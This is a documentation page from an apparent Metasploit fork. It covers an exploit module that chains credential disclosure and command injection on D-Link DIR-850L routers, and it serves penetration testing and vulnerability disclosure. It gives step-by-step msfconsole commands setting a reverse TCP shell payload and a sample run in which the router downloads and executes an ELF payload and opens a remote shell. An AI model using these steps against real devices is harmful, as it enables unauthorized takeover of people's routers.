adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
40bcb3f0c8846e67b6ce61758f7115bd91c5b2a5
metasploit-gs/documentation/modules/exploit/linux/http/dlink_dir850l_unauth_exec.md
T
Austin 40bcb3f0c8 update documentation
2017-11-03 09:09:51 -04:00

2.6 KiB
Raw Blame History

The module dlink_dir850_(un)auth_exec leverages an unauthenticated credential disclosure vulneralbility to then execute arbitrary commands via an authenticated OS command injection vulneralbility. D-LINK 850L (excluding "Cloud" models) devices with firmware version up to 1.14B07 are potentially vulnerable. The vulneralbility seems to occur within the parsing of the config. Another PoC can be found here https://www.seebug.org/vuldb/ssvid-96333. Setting command to be reboot will force the router into an infinite loop.

Vulnerable Application

  1. Start msfconsole
  2. Do : use exploit/linux/http/dlink_dir850l_unauth_exec.rb
  3. Do : set RHOST [RouterIP]
  4. Do : set PAYLOAD linux/mipsle/shell/reverse_tcp
  5. Do : run
  6. If router is vulnerable, payload should be dropped via wget and executed, and therein should obtain an session

Example

msf > use exploit/linux/http/dlink_dir850l_unauth_exec
msf exploit(dlink_850l_unauthenticated_exec) > set RHOST 192.168.0.14
RHOST => 192.168.0.14
msf exploit(dlink_850l_unauthenticated_exec) > set RPORT 80
RPORT => 80
msf exploit(dlink_850l_unauthenticated_exec) > set LHOST ens3
LHOST => ens3
msf exploit(dlink_850l_unauthenticated_exec) > set LPORT 1351
LPORT => 1351
msf exploit(dlink_850l_unauthenticated_exec) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.0.11:1351
msf exploit(dlink_850l_unauthenticated_exec) > [*] 192.168.0.14:80 - Starting up web service http://192.168.0.11:80/kiRtmoNlSNHUnxO
[*] Using URL: http://0.0.0.0:80/kiRtmoNlSNHUnxO
[*] Local IP: http://192.168.0.11:80/kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Asking target to request to download http://192.168.0.11:80/kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Waiting for target to request the ELF payload...
[*] 192.168.0.14:80 - Sending payload to the server...
[*] 192.168.0.14:80 - Requesting device to chmod kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Requesting device to execute kiRtmoNlSNHUnxO
[*] 192.168.0.14:80 - Waiting for shell to connect back to us...
[*] Sending stage (84 bytes) to 192.168.0.14
[*] Command shell session 1 opened (192.168.0.11:1351 -> 192.168.0.14:48679) at 2017-11-03 09:05:13 -0400
[+] Deleted /tmp/dhufstzw
sessions -i 1
[*] Starting interaction with 1...

3353690789
yBvPAaTjxEjNJrrzHHdFNXGNWNywfECC
true
MhhOHvSRnLmxcFwdTiIdZFcHzGRAIhlA
mMzxldJdkNYWlIrHrOazzOcpCRTuRipt
OayNFBMDfTSaJIFwpNPoWErXCvLmIguK
[-] Exploit aborted due to failure: unknown: 192.168.0.14:80 - Shell never connected to us!, disconnect?
[*] Server stopped.
pwd
/
ls
www
var
usr
tmp
sys
sbin
proc
mydlink
mnt
lib
include
htdocs
home
etc
dev
bin
Reference in New Issue View Git Blame Copy Permalink